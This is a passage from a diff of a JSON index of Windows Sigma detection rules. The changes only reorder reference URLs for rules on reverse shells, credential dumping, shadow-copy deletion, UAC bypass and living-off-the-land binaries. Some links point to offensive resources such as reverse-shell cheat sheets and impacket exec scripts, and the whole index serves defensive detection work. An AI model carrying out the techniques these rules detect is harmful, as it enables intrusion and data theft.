"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", - "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://redcanary.com/blog/raspberry-robin/", + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://twitter.com/Hexacorn/status/1187143326673330176", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" ], "tags": [ @@ -38747,8 +38747,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/nt/dsacls.html", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://ss64.com/nt/dsacls.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" ], "tags": [ @@ -38815,9 +38815,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" ], @@ -38913,8 +38913,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" ], @@ -39079,8 +39079,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" ], @@ -39342,9 +39342,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/", "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100", "https://twitter.com/ClearskySec/status/960924755355369472", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml" ], "tags": [ @@ -39437,8 +39437,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", + "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" ], "tags": [ @@ -39611,8 +39611,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml" ], "tags": [ @@ -39636,9 +39636,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" ], "tags": [ @@ -39671,8 +39671,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" ], "tags": [ @@ -39705,8 +39705,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" ], "tags": [ @@ -39772,14 +39772,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://github.com/SigmaHQ/sigma/issues/3742", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://twitter.com/gN3mes1s/status/941315826107510784", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/SigmaHQ/sigma/issues/3742", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" ], "tags": [ @@ -39821,8 +39821,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" ], @@ -39915,9 +39915,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://adepts.of0x.cc/netsh-portproxy-code/", "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://www.dfirnotes.net/portproxy_detection/", + "https://adepts.of0x.cc/netsh-portproxy-code/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" ], "tags": [ @@ -40117,8 +40117,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" ], "tags": [ @@ -40205,11 +40205,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" ], @@ -40260,8 +40260,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml" ], @@ -40390,8 +40390,8 @@ "logsource.product": "windows", "refs": [ "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml" ], "tags": [ @@ -40434,10 +40434,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", "https://twitter.com/max_mal_/status/1542461200797163522", "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" ], "tags": [ @@ -40470,8 +40470,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1477925112561209344", "https://twitter.com/wdormann/status/1478011052130459653?s=20", + "https://twitter.com/0gtweet/status/1477925112561209344", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_format.yml" ], "tags": [ @@ -40494,9 +40494,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", - "https://ss64.com/nt/dsacls.html", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://ss64.com/nt/dsacls.html", + "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" ], "tags": [ @@ -40606,8 +40606,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/08/ryuks-return/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://thedfirreport.com/2020/10/08/ryuks-return/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml" ], "tags": [ @@ -40641,8 +40641,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", - "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", + "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml" ], "tags": [ @@ -40769,9 +40769,9 @@ "logsource.product": "windows", "refs": [ "https://youtu.be/5mqid-7zp8k?t=2481", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" ], "tags": [ @@ -40925,9 +40925,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", "https://twitter.com/_felamos/status/1204705548668555264", "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" ], "tags": [ @@ -40960,8 +40960,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" ], "tags": [ @@ -41199,8 +41199,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" ], "tags": [ @@ -41290,8 +41290,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/subTee/status/1216465628946563073", "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", + "https://twitter.com/subTee/status/1216465628946563073", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml" ], "tags": [ @@ -41358,8 +41358,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" ], "tags": [ @@ -41472,8 +41472,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", "https://twitter.com/filip_dragovic/status/1590052248260055041", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", "https://twitter.com/filip_dragovic/status/1590104354727436290", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" ], @@ -41529,8 +41529,8 @@ "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml" ], "tags": [ @@ -41563,8 +41563,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg", "https://twitter.com/mrd0x/status/1511489821247684615", + "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml" ], "tags": [ @@ -41598,8 +41598,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/muddywater/88059/", "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", + "https://securelist.com/muddywater/88059/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" ], "tags": [ @@ -41708,10 +41708,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.activecyber.us/activelabs/windows-uac-bypass", "https://twitter.com/ReaQta/status/1222548288731217921", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", + "https://www.activecyber.us/activelabs/windows-uac-bypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" ], "tags": [ @@ -41745,8 +41745,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", + "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml" ], @@ -41780,9 +41780,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.python.org/3/using/cmdline.html#cmdoption-c", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.revshells.com/", - "https://docs.python.org/3/using/cmdline.html#cmdoption-c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml" ], "tags": [ @@ -42146,8 +42146,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/PhilipTsukerman/status/992021361106268161", "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", + "https://twitter.com/PhilipTsukerman/status/992021361106268161", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml" ], "tags": [ @@ -42214,14 +42214,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", - "https://blog.talosintelligence.com/2017/05/wannacry.html", - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/Neo23x0/Raccine#the-process", - "https://redcanary.com/blog/intelligence-insights-october-2021/", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", + "https://github.com/Neo23x0/Raccine#the-process", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://blog.talosintelligence.com/2017/05/wannacry.html", + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml" ], @@ -42258,8 +42258,8 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" ], "tags": [ @@ -42283,9 +42283,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://isc.sans.edu/diary/22264", - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" ], "tags": [ @@ -42362,8 +42362,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/", "https://github.com/S3cur3Th1sSh1t/SharpImpersonation", + "https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_impersonation_tool.yml" ], "tags": [ @@ -42495,11 +42495,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/bohops/status/980659399495741441", "https://twitter.com/JohnLaTwC/status/1223292479270600706", "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", - "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://twitter.com/bohops/status/980659399495741441", + "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" ], "tags": [ @@ -42600,8 +42600,8 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", - "https://twitter.com/bryon_/status/975835709587075072", "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", + "https://twitter.com/bryon_/status/975835709587075072", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" ], "tags": [ @@ -42801,8 +42801,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/cube0x0", "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", + "https://github.com/cube0x0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" ], "tags": "No established tags" @@ -42823,8 +42823,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml" ], "tags": [ @@ -42857,10 +42857,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", - "https://twitter.com/Z3Jpa29z/status/1317545798981324801", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", + "https://twitter.com/Z3Jpa29z/status/1317545798981324801", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" ], "tags": [ @@ -43031,8 +43031,8 @@ "logsource.product": "windows", "refs": [ "https://www.nirsoft.net/utils/nircmd.html", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" ], "tags": [ @@ -43124,10 +43124,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/hfiref0x/UACME", "https://twitter.com/hFireF0X/status/897640081053364225", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", - "https://github.com/hfiref0x/UACME", - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml" ], "tags": [ @@ -43197,8 +43197,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", "https://twitter.com/x86matthew/status/1505476263464607744?s=12", + "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" ], "tags": "No established tags" @@ -43271,8 +43271,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" ], @@ -43299,8 +43299,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1186631731543236608", - 